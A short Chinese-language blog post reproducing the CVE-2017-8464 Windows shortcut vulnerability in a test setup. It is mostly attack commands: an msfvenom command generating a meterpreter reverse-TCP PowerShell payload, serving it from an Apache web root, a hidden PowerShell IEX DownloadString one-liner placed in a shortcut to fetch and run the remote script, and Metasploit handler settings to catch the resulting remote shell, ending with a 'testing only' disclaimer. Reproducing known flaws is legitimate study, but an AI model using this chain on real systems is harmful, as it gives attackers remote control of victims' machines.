美文网首页工具使用手册
CVE-2017-8464漏洞复现

CVE-2017-8464漏洞复现

作者: _String_ | 来源:发表于2017-09-29 13:50 被阅读0次

    该漏洞以存在一段时间,由于能力问题一直未对该漏洞利用方式进行测试,今天学过程中记录一下测试流程。

    1. 确认系统是否存在该漏洞
    2. 使用msfvenom 生成反弹shell,shell生成方式如下:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.203.1 LPORT=5555 -f psh-reflection >test.ps1


    生成反弹shell
    确认生成文件
    1. 将生成文件放到apache网站根目录

    sudo cp test.ps1 /var/www/html/


    复制完成
    1. 启用apache服务

    sudo service apache2 start
    启动服务后通过curl方式测试是否正常访问

    服务启动
    1. 在靶机上启用powershell链接

    powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://.../sonar.ps1');xx.ps1" 保存为exe文件。

    新建快捷方式 保存
    1. 在攻击端监听反弹
      metasploit做以下相关配置:

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST ...
    msf exploit(handler) > set LPORT ****
    msf exploit(handler) > run

    启动监听
    1. 在被攻击端运行创建快捷键
    2. msf获取到远程shell
    反弹成功 执行系统命令

    仅作自己测试,请勿违规使用。

    相关文章

      网友评论

        本文标题:CVE-2017-8464漏洞复现

        本文链接:https://www.haomeiwen.com/subject/ofdiextx.html